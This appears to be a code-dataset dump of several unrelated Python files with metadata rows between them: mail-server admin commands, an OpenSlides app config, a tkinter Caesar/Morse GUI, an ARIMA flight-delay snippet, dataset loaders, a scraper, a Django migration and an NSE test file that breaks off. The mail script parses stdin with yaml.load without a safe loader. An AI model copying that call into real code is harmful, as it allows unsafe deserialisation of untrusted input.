def admin(localpart, domain_name, password):
""" Create an admin user
"""
domain = models.Domain.query.get(domain_name)
if not domain:
domain = models.Domain(name=domain_name)
db.session.add(domain)
user = models.User(
localpart=localpart,
domain=domain,
global_admin=True
)
user.set_password(password)
db.session.add(user)
db.session.commit()
@manager.command
def user(localpart, domain_name, password, hash_scheme=app.config['PASSWORD_SCHEME']):
""" Create a user
"""
domain = models.Domain.query.get(domain_name)
if not domain:
domain = models.Domain(name=domain_name)
db.session.add(domain)
user = models.User(
localpart=localpart,
domain=domain,
global_admin=False
)
user.set_password(password, hash_scheme=hash_scheme)
db.session.add(user)
db.session.commit()
@manager.command
def user_import(localpart, domain_name, password_hash, hash_scheme=app.config['PASSWORD_SCHEME']):
""" Import a user along with password hash. Available hashes:
'SHA512-CRYPT'
'SHA256-CRYPT'
'MD5-CRYPT'
'CRYPT'
"""
domain = models.Domain.query.get(domain_name)
if not domain:
domain = models.Domain(name=domain_name)
db.session.add(domain)
user = models.User(
localpart=localpart,
domain=domain,
global_admin=False
)
user.set_password(password_hash, hash_scheme=hash_scheme, raw=True)
db.session.add(user)
db.session.commit()
@manager.command
def config_update(delete_objects=False):
"""sync configuration with data from YAML-formatted stdin"""
import yaml, sys
new_config=yaml.load(sys.stdin)
# print new_config
users=new_config['users']
tracked_users=set()
for user_config in users:
localpart=user_config['localpart']
domain_name=user_config['domain']
password_hash=user_config['password_hash']
hash_scheme=user_config['hash_scheme']
domain = models.Domain.query.get(domain_name)
email='{0}@{1}'.format(localpart,domain_name)
if not domain:
domain = models.Domain(name=domain_name)
db.session.add(domain)
user = models.User.query.get(email)
tracked_users.add(email)
if not user:
user = models.User(
localpart=localpart,
domain=domain,
global_admin=False
)
user.set_password(password_hash, hash_scheme=hash_scheme, raw=True)
db.session.add(user)
aliases=new_config['aliases']
tracked_aliases=set()
for alias_config in aliases:
localpart=alias_config['localpart']
domain_name=alias_config['domain']
destination=alias_config['destination']
domain = models.Domain.query.get(domain_name)
email='{0}@{1}'.format(localpart,domain_name)
if not domain:
domain = models.Domain(name=domain_name)
db.session.add(domain)
alias = models.Alias.query.get(email)
tracked_aliases.add(email)
if not alias:
alias = models.Alias(
localpart=localpart,
domain=domain,
destination=destination.split(','),
email=email
)
else:
alias.destination = destination.split(',')
db.session.add(alias)
if delete_objects:
for user in db.session.query(models.User).all():
if not ( user.email in tracked_users ):
db.session.delete(user)
for alias in db.session.query(models.Alias).all():
if not ( alias.email in tracked_aliases ):
db.session.delete(alias)
db.session.commit()
@manager.command
def user_delete(email):
"""delete user"""
user = models.User.query.get(email)
if user:
db.session.delete(user)
db.session.commit()
@manager.command
def alias_delete(email):
"""delete alias"""
alias = models.Alias.query.get(email)
if alias:
db.session.delete(alias)
db.session.commit()
@manager.command
def alias(localpart, domain_name, destination):
""" Create an alias
"""
domain = models.Domain.query.get(domain_name)
if not domain:
domain = models.Domain(name=domain_name)
db.session.add(domain)
alias = models.Alias(
localpart=localpart,
domain=domain,
destination=destination.split(','),
email="%s@%s" % (localpart, domain_name)
)
db.session.add(alias)
db.session.commit()
# Set limits to a domain
@manager.command
def setlimits(domain_name, max_users, max_aliases, max_quota_bytes):
domain = models.Domain.query.get(domain_name)
domain.max_users = max_users
domain.max_aliases = max_aliases
domain.max_quota_bytes = max_quota_bytes
db.session.add(domain)
db.session.commit()
# Make the user manager of a domain
@manager.command
def setmanager(domain_name, user_name='manager'):
domain = models.Domain.query.get(domain_name)
manageruser = models.User.query.get(user_name + '@' + domain_name)
domain.managers.append(manageruser)
db.session.add(domain)
db.session.commit()
if __name__ == "__main__":
manager.run()
| 30.396648 | 98 | 0.638669 | 661 | 5,441 | 5.108926 | 0.12708 | 0.094759 | 0.074622 | 0.054486 | 0.58928 | 0.538348 | 0.494522 | 0.438851 | 0.438851 | 0.438851 | 0 | 0.002691 | 0.248851 | 5,441 | 178 | 99 | 30.567416 | 0.823587 | 0.060283 | 0 | 0.604167 | 0 | 0 | 0.029058 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0.055556 | 0.027778 | 0 | 0.090278 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
252c44b3659adf626a1bf74137b1ac5bb437e4d0 | 1,697 | py | Python | openslides/mediafiles/apps.py | boehlke/OpenSlides | 7a64fb83ebda2cb41706f62d7cfc5a63dbcab4a2 | [
"MIT"
] | null | null | null | openslides/mediafiles/apps.py | boehlke/OpenSlides | 7a64fb83ebda2cb41706f62d7cfc5a63dbcab4a2 | [
"MIT"
] | null | null | null | openslides/mediafiles/apps.py | boehlke/OpenSlides | 7a64fb83ebda2cb41706f62d7cfc5a63dbcab4a2 | [
"MIT"
] | null | null | null | from typing import Any, Dict, Set
from django.apps import AppConfig
class MediafilesAppConfig(AppConfig):
name = "openslides.mediafiles"
verbose_name = "OpenSlides Mediafiles"
angular_site_module = True
def ready(self):
# Import all required stuff.
from openslides.core.signals import permission_change
from openslides.utils.rest_api import router
from .projector import register_projector_elements
from .signals import get_permission_change_data
from .views import MediafileViewSet
from . import serializers # noqa
from ..utils.access_permissions import required_user
# Define projector elements.
register_projector_elements()
# Connect signals.
permission_change.connect(
get_permission_change_data,
dispatch_uid="mediafiles_get_permission_change_data",
)
# Register viewsets.
router.register(
self.get_model("Mediafile").get_collection_string(), MediafileViewSet
)
# register required_users
required_user.add_collection_string(
self.get_model("Mediafile").get_collection_string(), required_users
)
def get_startup_elements(self):
"""
Yields all Cachables required on startup i. e. opening the websocket
connection.
"""
yield self.get_model("Mediafile")
def required_users(element: Dict[str, Any]) -> Set[int]:
"""
Returns all user ids that are displayed as uploaders in any mediafile
if request_user can see mediafiles. This function may return an empty
set.
"""
return set(element["uploader_id"])
| 30.854545 | 81 | 0.677666 | 186 | 1,697 | 5.967742 | 0.483871 | 0.072072 | 0.051351 | 0.062162 | 0.072072 | 0.072072 | 0.072072 | 0 | 0 | 0 | 0 | 0 | 0.255156 | 1,697 | 54 | 82 | 31.425926 | 0.878165 | 0.2033 | 0 | 0 | 0 | 0 | 0.090557 | 0.044892 | 0 | 0 | 0 | 0 | 0 | 1 | 0.103448 | false | 0 | 0.310345 | 0 | 0.586207 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
25324e38ee50c1cc55d682bc632801300c8229ca | 13,424 | py | Python | cryptography_playground.py | GabrielAlves/CryptographyPlayground | eae2048939b09e852ccf3424683462130c4f3ee9 | [
"MIT"
] | null | null | null | cryptography_playground.py | GabrielAlves/CryptographyPlayground | eae2048939b09e852ccf3424683462130c4f3ee9 | [
"MIT"
] | null | null | null | cryptography_playground.py | GabrielAlves/CryptographyPlayground | eae2048939b09e852ccf3424683462130c4f3ee9 | [
"MIT"
] | null | null | null | import tkinter as tk
from tkinter import ttk
from tkinter import scrolledtext
from tkinter import messagebox as msg
from tkinter import Menu
from i18n.i18n_cryptography_playground import I18NCryptographyPlayground
from i18n.i18n_message_box import I18NMessageBox
from gui_settings import GUISettings
from cryptography_algorithms.morse import Morse
from cryptography_algorithms.caesar import Caesar
from about_project_view import AboutProjectView
class CryptographyPlayground:
def __init__(self):
self.create_widgets()
def create_widgets(self):
self.create_window()
self.create_menu()
self.create_tabs()
self.create_widgets_of_coding_tab()
self.create_widgets_of_decoding_tab()
def define_gui_settings(self):
self.gui_settings = GUISettings()
def create_window(self):
self.window = tk.Tk()
self.configure_window()
def define_gui_language(self):
self.i18n_cryptography_playground = I18NCryptographyPlayground("en")
self.i18n_message_box = I18NMessageBox("en")
def configure_window(self):
self.define_gui_settings()
self.define_gui_language()
self.window.title(self.i18n_cryptography_playground.window_title)
self.window.iconbitmap(self.window, "images/icons/lock_icon.ico")
self.window.resizable(False, False)
def create_menu(self):
self.create_menu_bar()
self.create_file_menu_item()
self.create_help_menu_item()
def create_menu_bar(self):
self.menu_bar = Menu(self.window)
self.window.configure(menu = self.menu_bar)
def create_file_menu_item(self):
self.file_menu = Menu(self.menu_bar, tearoff = 0)
self.file_menu.add_command(label = self.i18n_cryptography_playground.menu_file_new_label, command = self.open_new_window)
self.file_menu.add_command(label = self.i18n_cryptography_playground.menu_file_exit_label, command = self.close_window)
self.menu_bar.add_cascade(label = self.i18n_cryptography_playground.menu_file_label, menu = self.file_menu)
def create_help_menu_item(self):
self.help_menu = Menu(self.menu_bar, tearoff = 0)
self.help_menu.add_command(label = self.i18n_cryptography_playground.menu_help_about_label, command = AboutProjectView)
self.menu_bar.add_cascade(label = self.i18n_cryptography_playground.menu_help_label, menu = self.help_menu)
def create_tabs(self):
self.create_tab_control()
self.create_coding_tab()
self.create_decoding_tab()
self.manage_tab_control()
def create_tab_control(self):
self.tab_control = ttk.Notebook(self.window)
def create_coding_tab(self):
self.coding_tab = ttk.Frame(self.tab_control)
self.tab_control.add(self.coding_tab, text = self.i18n_cryptography_playground.coding_tab_text)
def create_decoding_tab(self):
self.decoding_tab = ttk.Frame(self.tab_control)
self.tab_control.add(self.decoding_tab, text = self.i18n_cryptography_playground.decoding_tab_text)
def manage_tab_control(self):
self.tab_control.pack(expand = 1, fill = "both")
def create_widgets_of_coding_tab(self):
self.create_coding_section_labelframe()
self.create_widgets_from_coding_section_labelframe()
self.create_encryption_options_labelframe()
self.create_buttons_from_encryption_options()
def create_coding_section_labelframe(self):
self.coding_labelframe = ttk.LabelFrame(self.coding_tab, text = self.i18n_cryptography_playground.coding_section_labelframe)
self.coding_labelframe.grid(row = 0, padx = self.gui_settings.coding_section_padding_width, pady = self.gui_settings.padding_height)
def create_widgets_from_coding_section_labelframe(self):
self.create_label_for_message_to_be_encrypted()
self.create_scrolledtext_for_message_to_be_encrypted()
self.create_label_for_encrypted_message()
self.create_scrolledtext_for_encrypted_message()
def create_label_for_message_to_be_encrypted(self):
self.label_for_message_to_be_encrypted = ttk.Label(self.coding_labelframe, text = self.i18n_cryptography_playground.label_for_message_to_be_encrypted, font = (self.gui_settings.font_family, self.gui_settings.font_size))
self.label_for_message_to_be_encrypted.grid(row = 1)
def create_scrolledtext_for_message_to_be_encrypted(self):
self.scrolledtext_for_message_to_be_encrypted = scrolledtext.ScrolledText(self.coding_labelframe, width = self.gui_settings.scrolledtext_width, height = self.gui_settings.scrolledtext_height, font = (self.gui_settings.font_family, self.gui_settings.font_size), wrap = tk.WORD)
self.scrolledtext_for_message_to_be_encrypted.grid(row = 2, pady = self.gui_settings.padding_height)
self.scrolledtext_for_message_to_be_encrypted.focus()
def create_label_for_encrypted_message(self):
self.label_encrypted_message = ttk.Label(self.coding_labelframe, text = self.i18n_cryptography_playground.label_encrypted_message, font = (self.gui_settings.font_family, self.gui_settings.font_size))
self.label_encrypted_message.grid(row = 3)
def create_scrolledtext_for_encrypted_message(self):
self.scrolledtext_for_encrypted_message = scrolledtext.ScrolledText(self.coding_labelframe, width = self.gui_settings.scrolledtext_width, height = self.gui_settings.scrolledtext_height, font = (self.gui_settings.font_family, self.gui_settings.font_size), wrap = tk.WORD)
self.scrolledtext_for_encrypted_message.grid(row = 4, pady = self.gui_settings.padding_height)
def create_encryption_options_labelframe(self):
self.coding_tab_cryptography_options = ttk.LabelFrame(self.coding_labelframe, text = self.i18n_cryptography_playground.cryptography_options)
self.coding_tab_cryptography_options.grid(row = 5, pady = self.gui_settings.padding_height, sticky = tk.W)
def create_buttons_from_encryption_options(self):
self.create_caesar_encryption_button()
self.create_morse_encryption_button()
self.add_padding_to_encryption_buttons()
def create_caesar_encryption_button(self):
self.button_caesar_cryptography = ttk.Button(self.coding_tab_cryptography_options, text = self.i18n_cryptography_playground.caesar_cryptography_button_text, command = lambda : self.process_message(Caesar, "encrypt", self.scrolledtext_for_message_to_be_encrypted, self.scrolledtext_for_encrypted_message))
self.button_caesar_cryptography.grid(column = 0, row = 0, sticky = tk.W)
def create_morse_encryption_button(self):
self.button_morse_cryptography = ttk.Button(self.coding_tab_cryptography_options, text = self.i18n_cryptography_playground.morse_cryptography_button_text, command = lambda : self.process_message(Morse, "encrypt", self.scrolledtext_for_message_to_be_encrypted, self.scrolledtext_for_encrypted_message))
self.button_morse_cryptography.grid(column = 1, row = 0, sticky = tk.W)
def add_padding_to_encryption_buttons(self):
for button in self.coding_tab_cryptography_options.winfo_children():
button.grid_configure(padx = self.gui_settings.padding_width, pady = self.gui_settings.padding_height)
def create_widgets_of_decoding_tab(self):
self.create_decoding_section_labelframe()
self.create_widgets_from_decoding_section_labelframe()
self.create_decryption_options_labelframe()
self.create_buttons_from_decryption_options()
def create_decoding_section_labelframe(self):
self.decoding_labelframe = ttk.LabelFrame(self.decoding_tab, text = self.i18n_cryptography_playground.decoding_section_labelframe)
self.decoding_labelframe.grid(row = 0, padx = self.gui_settings.coding_section_padding_width, pady = self.gui_settings.padding_height)
def create_widgets_from_decoding_section_labelframe(self):
self.create_label_for_message_to_be_decrypted()
self.create_scrolledtext_for_message_to_be_decrypted()
self.create_label_for_decrypted_message()
self.create_scrolledtext_for_decrypted_message()
def create_label_for_message_to_be_decrypted(self):
self.label_for_message_to_be_decrypted = ttk.Label(self.decoding_labelframe, text = self.i18n_cryptography_playground.label_for_message_to_be_decrypted, font = (self.gui_settings.font_family, self.gui_settings.font_size))
self.label_for_message_to_be_decrypted.grid(row = 1)
def create_scrolledtext_for_message_to_be_decrypted(self):
self.scrolledtext_for_message_to_be_decrypted = scrolledtext.ScrolledText(self.decoding_labelframe, width = self.gui_settings.scrolledtext_width, height = self.gui_settings.scrolledtext_height, font = (self.gui_settings.font_family, self.gui_settings.font_size), wrap = tk.WORD)
self.scrolledtext_for_message_to_be_decrypted.grid(row = 2, pady = self.gui_settings.padding_height)
self.scrolledtext_for_message_to_be_decrypted.focus()
def create_label_for_decrypted_message(self):
self.label_decrypted_message = ttk.Label(self.decoding_labelframe, text = self.i18n_cryptography_playground.label_decrypted_message, font = (self.gui_settings.font_family, self.gui_settings.font_size))
self.label_decrypted_message.grid(row = 3)
def create_scrolledtext_for_decrypted_message(self):
self.scrolledtext_for_decrypted_message = scrolledtext.ScrolledText(self.decoding_labelframe, width = self.gui_settings.scrolledtext_width, height = self.gui_settings.scrolledtext_height, font = (self.gui_settings.font_family, self.gui_settings.font_size), wrap = tk.WORD)
self.scrolledtext_for_decrypted_message.grid(row = 4, pady = self.gui_settings.padding_height)
def create_decryption_options_labelframe(self):
self.decoding_tab_cryptography_options = ttk.LabelFrame(self.decoding_labelframe, text = self.i18n_cryptography_playground.cryptography_options)
self.decoding_tab_cryptography_options.grid(row = 5, pady = self.gui_settings.padding_height, sticky = tk.W)
def create_buttons_from_decryption_options(self):
self.create_caesar_decryption_button()
self.create_morse_decryption_button()
self.add_padding_to_decryption_buttons()
def create_caesar_decryption_button(self):
self.button_caesar_cryptography = ttk.Button(self.decoding_tab_cryptography_options, text = self.i18n_cryptography_playground.caesar_cryptography_button_text, command = lambda : self.process_message(Caesar, "decrypt", self.scrolledtext_for_message_to_be_decrypted, self.scrolledtext_for_decrypted_message))
self.button_caesar_cryptography.grid(column = 0, row = 0, sticky = tk.W)
def create_morse_decryption_button(self):
self.button_morse_cryptography = ttk.Button(self.decoding_tab_cryptography_options, text = self.i18n_cryptography_playground.morse_cryptography_button_text, command = lambda : self.process_message(Morse, "decrypt", self.scrolledtext_for_message_to_be_decrypted, self.scrolledtext_for_decrypted_message))
self.button_morse_cryptography.grid(column = 1, row = 0, sticky = tk.W)
def add_padding_to_decryption_buttons(self):
for button in self.decoding_tab_cryptography_options.winfo_children():
button.grid_configure(padx = self.gui_settings.padding_width, pady = self.gui_settings.padding_height)
def close_window(self):
self.window.quit()
self.window.destroy()
exit()
def open_new_window(self):
CryptographyPlayground()
def show_message_box(self, type, title, content):
type = type.lower()
if type == "info":
msg.showinfo(title, content)
elif type == "warning":
msg.showwarning(title, content)
elif type == "error":
msg.showerror(title, content)
def change_message_on_scrolledtext(self, scrolledtext, message):
scrolledtext.delete("1.0", "end")
scrolledtext.insert("1.0", message)
def get_text_from_scrolledtext(self, scrolledtext):
text = scrolledtext.get("1.0", "end-1c").strip()
return text
def process_message(self, cryptography_algorithm, action, source_scrolledtext, destiny_scrolledtext):
source_message = self.get_text_from_scrolledtext(source_scrolledtext)
if source_message == "":
self.show_message_box("warning", self.i18n_message_box.nothing_written_warning_title, self.i18n_message_box.nothing_written_warning_content)
else:
try:
if action == "encrypt":
destiny_message = cryptography_algorithm().encrypt(source_message)
elif action == "decrypt":
destiny_message = cryptography_algorithm().decrypt(source_message)
self.change_message_on_scrolledtext(destiny_scrolledtext, destiny_message)
destiny_scrolledtext.focus()
except Exception as exception:
print(exception)
self.show_message_box("error", self.i18n_message_box.process_error_title, self.i18n_message_box.process_error_content)
if __name__ == "__main__":
cryptography_playground = CryptographyPlayground()
cryptography_playground.window.mainloop() | 46.611111 | 314 | 0.763409 | 1,696 | 13,424 | 5.627948 | 0.090212 | 0.048402 | 0.061289 | 0.035202 | 0.713567 | 0.618963 | 0.560922 | 0.518806 | 0.477318 | 0.42483 | 0 | 0.008657 | 0.156734 | 13,424 | 288 | 315 | 46.611111 | 0.834541 | 0 | 0 | 0.032086 | 0 | 0 | 0.009683 | 0.001937 | 0 | 0 | 0 | 0 | 0 | 1 | 0.240642 | false | 0 | 0.058824 | 0 | 0.31016 | 0.005348 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
25330a3bb45b3599bdfbcbefed2e79ea7956ce76 | 1,234 | py | Python | chapter 9/sampleCode43.py | DTAIEB/Thoughtful-Data-Science | 8b80e8f3e33b6fdc6672ecee1f27e0b983b28241 | [
"Apache-2.0"
] | 15 | 2018-06-01T19:18:32.000Z | 2021-11-28T03:31:35.000Z | chapter 9/sampleCode43.py | chshychen/Thoughtful-Data-Science | 8b80e8f3e33b6fdc6672ecee1f27e0b983b28241 | [
"Apache-2.0"
] | 1 | 2018-12-17T02:01:42.000Z | 2018-12-17T02:01:42.000Z | chapter 9/sampleCode43.py | chshychen/Thoughtful-Data-Science | 8b80e8f3e33b6fdc6672ecee1f27e0b983b28241 | [
"Apache-2.0"
] | 10 | 2018-09-23T02:45:45.000Z | 2022-03-12T15:32:05.000Z | [[PredictDelayApp]]
@route(flight_segment="*", airline="*")
@captureOutput
def predict_screen(self, flight_segment, airline):
if flight_segment is None or flight_segment == "":
return "<div>Please select a flight segment</div>"
airport = flight_segment.split(":")[1]
mask = (flights["DESTINATION_AIRPORT"] == airport)
if airline is not None and airline != "":
mask = mask & (flights["AIRLINE"] == airline)
df = flights[mask]
df.index = df["DEPARTURE_TIME"]
df = df.tail(50000)
df = df[~df.index.duplicated(keep='first')]
with warnings.catch_warnings():
warnings.simplefilter("ignore")
arima_model_class = ARIMA(df["ARRIVAL_DELAY"], dates=df['DEPARTURE_TIME'], order=(1,1,1))
arima_model = arima_model_class.fit(disp=0)
fig, ax = plt.subplots(figsize = (12,8))
num_observations = 100
date_series = df["DEPARTURE_TIME"]
arima_model.plot_predict(
start = str(date_series[len(date_series)-num_observations]),
end = str(date_series[len(date_series)-1]),
ax = ax
)
plt.show()
| 44.071429 | 101 | 0.577796 | 140 | 1,234 | 4.907143 | 0.492857 | 0.113537 | 0.065502 | 0.046579 | 0.075691 | 0.075691 | 0 | 0 | 0 | 0 | 0 | 0.019384 | 0.289303 | 1,234 | 27 | 102 | 45.703704 | 0.763968 | 0 | 0 | 0 | 0 | 0 | 0.110211 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
253d9842198f444263b15bae02608b8b21a7d23d | 1,057 | py | Python | src/datasets/main.py | geostk/deepSVDD | caf44c93914414ca26525fec69b780e920b9d061 | [
"MIT"
] | 4 | 2018-06-26T13:11:34.000Z | 2018-07-21T02:54:29.000Z | src/datasets/main.py | gsrs/deepSVDD | caf44c93914414ca26525fec69b780e920b9d061 | [
"MIT"
] | null | null | null | src/datasets/main.py | gsrs/deepSVDD | caf44c93914414ca26525fec69b780e920b9d061 | [
"MIT"
] | null | null | null | from datasets.__local__ import implemented_datasets
from datasets.mnist import MNIST_DataLoader
from datasets.cifar10 import CIFAR_10_DataLoader
from datasets.bedroom import Bedroom_DataLoader
from datasets.toy import ToySeq_DataLoader
from datasets.normal import Normal_DataLoader
from datasets.adult import Adult_DataLoader
def load_dataset(learner, dataset_name, pretrain=False):
assert dataset_name in implemented_datasets
if dataset_name == "mnist":
data_loader = MNIST_DataLoader
if dataset_name == "cifar10":
data_loader = CIFAR_10_DataLoader
if dataset_name == "bedroom":
data_loader = Bedroom_DataLoader
if dataset_name == "toyseq":
data_loader = ToySeq_DataLoader
if dataset_name == "normal":
data_loader = Normal_DataLoader
if dataset_name == "adult":
data_loader = Adult_DataLoader
# load data with data loader
learner.load_data(data_loader=data_loader, pretrain=pretrain)
# check all parameters have been attributed
learner.data.check_all()
| 28.567568 | 65 | 0.755913 | 130 | 1,057 | 5.846154 | 0.261538 | 0.118421 | 0.102632 | 0.151316 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009302 | 0.186377 | 1,057 | 36 | 66 | 29.361111 | 0.874419 | 0.064333 | 0 | 0 | 0 | 0 | 0.036511 | 0 | 0 | 0 | 0 | 0 | 0.043478 | 1 | 0.043478 | false | 0 | 0.304348 | 0 | 0.347826 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
2542698ba96bb724294402a12a63e6c7c61bdcef | 219 | py | Python | hydrate.py | dlitvakb/horrible_dad_jokes_bot | d42f35d042f8726b0c6c5839e503d2fb458df105 | [
"Unlicense"
] | 3 | 2018-04-03T23:49:25.000Z | 2018-09-17T00:34:06.000Z | hydrate.py | dlitvakb/horrible_dad_jokes_bot | d42f35d042f8726b0c6c5839e503d2fb458df105 | [
"Unlicense"
] | 1 | 2021-06-01T22:01:08.000Z | 2021-06-01T22:01:08.000Z | hydrate.py | dlitvakb/horrible_dad_jokes_bot | d42f35d042f8726b0c6c5839e503d2fb458df105 | [
"Unlicense"
] | null | null | null | from scraper import TwitterScraper, ICanHazDadJokeScraper
scrapers = [
TwitterScraper('baddadjokes'),
ICanHazDadJokeScraper()
]
if __name__ == '__main__':
for scraper in scrapers:
scraper.scrape()
| 19.909091 | 57 | 0.716895 | 18 | 219 | 8.277778 | 0.722222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.191781 | 219 | 10 | 58 | 21.9 | 0.841808 | 0 | 0 | 0 | 0 | 0 | 0.086758 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
254cd5b3b4136d0220aa87f1ce969c3493e9878b | 617 | py | Python | enroll/migrations/0002_auto_20210409_2221.py | RitabrataDas343/Farmtract | a51f18408778295c5f7febc8d632d3556b0249e2 | [
"Apache-2.0"
] | 1 | 2021-04-10T10:35:07.000Z | 2021-04-10T10:35:07.000Z | enroll/migrations/0002_auto_20210409_2221.py | RitabrataDas343/Farmtract | a51f18408778295c5f7febc8d632d3556b0249e2 | [
"Apache-2.0"
] | null | null | null | enroll/migrations/0002_auto_20210409_2221.py | RitabrataDas343/Farmtract | a51f18408778295c5f7febc8d632d3556b0249e2 | [
"Apache-2.0"
] | null | null | null | # Generated by Django 3.1.7 on 2021-04-09 22:21
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('enroll', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='user',
old_name='regnum',
new_name='roll',
),
migrations.RemoveField(
model_name='user',
name='rollnum',
),
migrations.AddField(
model_name='user',
name='birthdate',
field=models.DateField(blank=True, null=True),
),
]
| 22.035714 | 58 | 0.534846 | 59 | 617 | 5.491525 | 0.694915 | 0.083333 | 0.12037 | 0.104938 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04703 | 0.345219 | 617 | 27 | 59 | 22.851852 | 0.754951 | 0.072934 | 0 | 0.285714 | 1 | 0 | 0.098246 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.047619 | 0 | 0.190476 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
254db43a4110c2edf1d3ec0af8cea5703fdfd641 | 3,421 | py | Python | Tests/Test.py | GamesBond008/NSE-India-Scrapper | 9963d1b99ee5557e61d6be329bf9f50444d2820a | [
"MIT"
] | 1 | 2021-06-01T19:36:42.000Z | 2021-06-01T19:36:42.000Z | Tests/Test.py | GamesBond008/NSE-India-Scrapper | 9963d1b99ee5557e61d6be329bf9f50444d2820a | [
"MIT"
] | null | null | null | Tests/Test.py | GamesBond008/NSE-India-Scrapper | 9963d1b99ee5557e61d6be329bf9f50444d2820a | [
"MIT"
] | null | null | null | import unittest,sys,datetime
sys.path.insert(0,'..')
from NSE.companies import Companies
from NSE.derivatives import Derivatives
from NSE.equitySMEMarket import EquitySMEMarket
from NSE.indices import Indices
from NSE.preOpenMarket import PreOpenMarket
from NSE import ValidSymbols
Sample_Company="RBLBANK"
Series=[ValidSymbols['COMPANIES']['EQ'],ValidSymbols['COMPANIES']['RL']]
class TestNSE(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.companies=Companies()
cls.equitySMEMarket=EquitySMEMarket()
cls.deriatives=Derivatives()
cls.indices=Indices()
cls.preOpenMarket=PreOpenMarket()
def test_init(self):
self.assertRaises(ValueError,Companies,-1)
def test_Company(self):
results=self.companies.GetPriceInfo(Sample_Company)
self.assertGreaterEqual(len(results),5)
self.assertEqual(results['info']['symbol'],Sample_Company)
results=self.companies.GetTradeInfo(Sample_Company)
self.assertGreaterEqual(len(results),4)
results=self.companies.HistoricalData(Sample_Company,Series,'1m')
self.assertGreaterEqual(len(results),2)
self.assertEqual(results['meta']['symbols'][0],'RBLBANK')
self.assertEqual(results['meta']['series'],['EQ','RL'])
self.assertGreaterEqual(len(results['data']),0)
self.assertRaises(ValueError,self.companies.HistoricalData,Sample_Company,Series,TimePeriod='1e')
self.assertRaises(ValueError,self.companies.HistoricalData,Sample_Company,Series,Start='2021-04-2021',End='06-02-2021')
self.assertRaises(ValueError,self.companies.HistoricalData,Sample_Company,Series,TimePeriod=['1'])
self.assertRaises(Exception,self.companies.HistoricalData,Sample_Company,Series,Start=12,End=23)
#Getting Data For Future Dates
self.assertRaises(Exception,self.companies.HistoricalData,Sample_Company,Series,Start='20-07-2022',End='20-05-2025')
def test_derivatives(self):
results=self.deriatives.EquityDerivatives(self.deriatives.TOP20CONTRACTS)
self.assertEqual(len(results),3)
self.assertEqual(len(results['data']),20)
results=self.deriatives.EquityDerivatives(self.deriatives.NIFTY50OPTIONS)
self.assertGreaterEqual(len(results['data']),50)
# self.assertRaises(RuntimeError,self.deriatives.EquityDerivatives,'sdsfsd')
self.assertRaises(ValueError,self.deriatives.EquityDerivatives,self.deriatives.ALLINRCONTRACTS)
self.assertGreaterEqual(len(self.deriatives.CurrencyDerivatives(self.deriatives.ALLINRCONTRACTS)['data']),1)
self.assertGreaterEqual(len(self.deriatives.CommodityDerivatives(self.deriatives.AGRICONTRACTS)['data']),1)
self.assertGreaterEqual(len(self.deriatives.InterestRateDerivatives(self.deriatives.GOVTSECFUTURES)),1)
def test_equity_sme_market(self):
self.assertRaises(ValueError,self.equitySMEMarket.EquityMarketWatch,{})
self.assertGreaterEqual(len(self.equitySMEMarket.EquityMarketWatch(self.equitySMEMarket.NIFTY_50)),1)
self.assertGreaterEqual(len(self.equitySMEMarket.SGBMarketWatch()['data']),1)
self.assertGreaterEqual(len(self.equitySMEMarket.ExchangeTradeFundsWatch()['data']),1)
self.assertGreaterEqual(len(self.equitySMEMarket.SMEMarketWatch()['data']),1)
def test_indices(self):
self.assertGreaterEqual(len(self.indices.IndicesMarketWatch()['data']),1)
def test_preOpenMarket(self):
